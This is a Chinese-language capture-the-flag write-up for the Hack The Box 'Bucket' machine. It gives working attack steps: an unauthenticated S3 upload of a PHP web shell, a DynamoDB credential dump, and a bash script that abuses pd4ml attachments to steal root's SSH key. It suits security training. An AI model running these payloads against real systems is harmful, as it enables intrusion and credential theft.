端口扫描 ┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ sudo nmap --min-rate=10000 -p- 10.10.10.212 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 22:06 CST Warning: 10.10.10.212 giving up on port because retransmission cap hit (10). Nmap scan report for 10.10.10.212 Host is up (0.070s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done : 1 IP address (1 host up) scanned in 15.24 seconds
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ sudo nmap -sT -sC -sV -O -p22,80 10.10.10.212 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 22:11 CST Nmap scan report for 10.10.10.212 Host is up (0.070s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd :9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 80/tcp open http Apache httpd 2.4.41 |_http-title: Did not follow redirect to http://bucket.htb/ |_http-server-header: Apache/2.4.41 (Ubuntu) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done : 1 IP address (1 host up) scanned in 13.35 seconds
添加hosts
S3存储桶 看上去像是个博客页面,在源码中发现s3域名,添加。这个界面估计是没内容了,来到s3的界面,插件显示是hypercorn服务器
根据之前的源代码和域名,猜测这是一个s3存储桶,那也就是有一个叫做adserver的存储桶
而且这应该是一个api端口,尝试枚举桶
有一个叫做adserver的桶
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ aws s3 ls --endpoint-url http://s3.bucket.htb/ 2024-09-14 23:09:02 adserver
上面有一个index.html和image作为键名的几张图片
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ aws s3 ls s3://adserver --endpoint-url http://s3.bucket.htb/ PRE images/ 2024-09-14 23:09:03 5344 index.html
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ aws s3 cp s3://adserver/index.html . --endpoint-url http://s3.bucket.htb/ download: s3://adserver/index.html to ./index.html
将index.html下载下来,发现与bucket.htb的那个index.html是一样的,那么也具有上传文件到那个网站目录的权限
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ echo '<?php system($_GET["cmd"]);?>' >shell.php
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ aws s3 cp shell.php s3://adserver/ --endpoint-url http://s3.bucket.htb upload: ./shell.php to s3://adserver/shell.php
上传和刷新似乎需要一点时间,是可以执行命令!做一个反弹shell
横向移动 还有一个roy用户,家目录中有一个project,里面一个db.php,连接的是DynamoDB
还有8000,44899
www-data@bucket:/home/roy/project$ ss -tlnp ss -tlnp State Recv-Q Send-Q Local Address:Port Peer Address:Port Process LISTEN 0 511 127.0.0.1:8000 0.0.0.0:* LISTEN 0 4096 127.0.0.1:44899 0.0.0.0:* LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* LISTEN 0 4096 127.0.0.1:4566 0.0.0.0:* LISTEN 0 128 0.0.0.0:22 0.0.0.0:* LISTEN 0 511 *:80 *:* LISTEN 0 128 [::]:22 [::]:*
先看DynamoDB,连接查看
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables { "TableNames" : [ "users" ] }
有一个users表,可以全部dump下来
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users { "Items" : [ { "password" : { "S" : "Management@#1@#" }, "username" : { "S" : "Mgmt" } }, { "password" : { "S" : "Welcome123!" }, "username" : { "S" : "Cloudadm" } }, { "password" : { "S" : "n2vM-<_K_Q:.Aa2" }, "username" : { "S" : "Sysadm" } } ], "Count" : 3, "ScannedCount" : 3, "ConsumedCapacity" : null }
得到了三对凭证
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ cat dbresult |jq -r '.Items[].password.S' Management@ Welcome123! n2vM-<_K_Q:.Aa2
尝试ssh连接roy,n2vM-<_K_Q:.Aa2可行
提权 把目光转到8000端口和44899,可以利用ssh做一个端口转发
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ ssh -L 10000:127.0.0.1:8000 roy@10.10.10.212 -fN roy@10.10.10.212's password:
先查看一下apache的虚拟主机配置文件
roy@bucket:/tmp$ cat /etc/apache2/ apache2.conf conf-enabled/ magic mods-enabled/ sites-available/ conf-available/ envvars mods-available/ ports.conf sites-enabled/ roy@bucket:/tmp$ cat /etc/apache2/sites-enabled/000-default.conf <VirtualHost 127.0.0.1:8000> <IfModule mpm_itk_module> AssignUserId root root </IfModule> DocumentRoot /var/www/bucket-app </VirtualHost> <VirtualHost *:80> DocumentRoot /var/www/html RewriteEngine On RewriteCond %{HTTP_HOST} !^bucket.htb$ RewriteRule /.* http://bucket.htb/ [R] </VirtualHost> <VirtualHost *:80> <SNIP> ProxyPreserveHost on ProxyPass / http://localhost:4566/ ProxyPassReverse / http://localhost:4566/ <Proxy *> Order deny,allow Allow from all </Proxy> ServerAdmin webmaster@localhost ServerName s3.bucket.htb <SNIP>
8000端口开的是/var/www/bucket-app的服务,并且查看一下这个目录,文件的所有者是root,目前我们是只有读的权限。看一下index.php
<?php require 'vendor/autoload.php'; use Aws\DynamoDb\DynamoDbClient; if ($_SERVER["REQUEST_METHOD"] === "POST") { if ($_POST["action"] === "get_alerts") { date_default_timezone_set('America/New_York'); $client = new DynamoDbClient([ 'profile' => 'default', 'region' => 'us-east-1', 'version' => 'latest', 'endpoint' => 'http://localhost:4566' ]); $iterator = $client->getIterator('Scan', array( 'TableName' => 'alerts', 'FilterExpression' => "title = :title", 'ExpressionAttributeValues' => array(":title" => array("S" => "Ransomware")), )); foreach ($iterator as $item) { $name = rand(1, 10000) . '.html'; file_put_contents('files/' . $name, $item["data"]); } passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf"); } } else { ?> <script src="https://static.codepen.io/assets/common/stopExecutionOnTimeout-157cd5b220a5c80d4ff8e0e70ac069bffd87a61252088146915e8726e5d9f147.js"></script> <script id="rendered-js"> // ¯\_(ツ)_/¯ I told you that there was no JS //# sourceURL=pen.js </script> </body> </html> <?php } ?>
主要逻辑就是检测是否POST请求的”action”参数的值为”get_alerts”,如果是的话,就连接本地的’alerts’表,并遍历扫描”Ransomware” 的记录然后保存在files/目录下的html文件。然后用一个pd4m工具将html文件转成pdf。
pd4ml允许添加附件,像是:
<html > <pd4ml:attachment src ="/etc/passwd" description ="attachment sample" icon ="Paperclip" /> </html >
那么相当于可以文件读取,只要更改src的文件,它就会被扫描然后带出来到pdf,并且我们是可读的
由于还没有alerts表,所以需要先创建一个,可以参考aws官方的模板创建
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ aws --endpoint-url http://s3.bucket.htb dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 { "TableDescription" : { "AttributeDefinitions" : [ { "AttributeName" : "title" , "AttributeType" : "S" }, { "AttributeName" : "data" , "AttributeType" : "S" } ], "TableName" : "alerts" , "KeySchema" : [ { "AttributeName" : "title" , "KeyType" : "HASH" }, { "AttributeName" : "data" , "KeyType" : "RANGE" } ], "TableStatus" : "ACTIVE" , "CreationDateTime" : "2024-09-15T15:33:51.623000+08:00" , "ProvisionedThroughput" : { "LastIncreaseDateTime" : "1970-01-01T08:00:00+08:00" , "LastDecreaseDateTime" : "1970-01-01T08:00:00+08:00" , "NumberOfDecreasesToday" : 0, "ReadCapacityUnits" : 10, "WriteCapacityUnits" : 5 }, "TableSizeBytes" : 0, "ItemCount" : 0, "TableArn" : "arn:aws:dynamodb:us-east-1:000000000000:table/alerts" } }
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables { "TableNames": [ "alerts", "users" ] }
那么尝试盗取root的ssh密钥
aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src=\"/root/.ssh/id_rsa\" description=\"attachment sample\" icon=\"Paperclip\"/></html>"}}'
但是发现刚创建的表不见了,pspy运行发现是有定制执行一个清理脚本。那么可以写一个sh脚本一键执行
#!/bin/bash aws --endpoint-url http://s3.bucket.htb dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 >/dev/null sleep 0.5aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src=\"/root/.ssh/id_rsa\" description=\"attachment sample\" icon=\"Paperclip\"/></html>"}}' >/dev/null sleep 0.5curl -s http://127.0.0.1:10000/index.php -d 'action=get_alerts' sleep 0.5
然后将pdf文件从靶机上cp下来
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ scp roy@bucket.htb:/tmp/result.pdf ./result.pdf roy@bucket.htb's password: result.pdf 100% 19KB 96.7KB/s 00:00
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ firefox result.pdf
浏览器打开pdf,点击附件,可以将附件保存
┌──(mikannse㉿kali)-[~/HTB/bucket] └─$ ssh -i id_rsa root@bucket.htb Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-48-generic x86_64) <SNIP> Last login: Tue Feb 9 14:39:03 2021 root@bucket:~ uid=0(root) gid=0(root) groups =0(root)
我们是root!
碎碎念 这个房间的环境还是非常陌生的,反正又是云安全的东西。从未授权写文件到DynamoDB的利用,最后用一个pdf的特性来提权
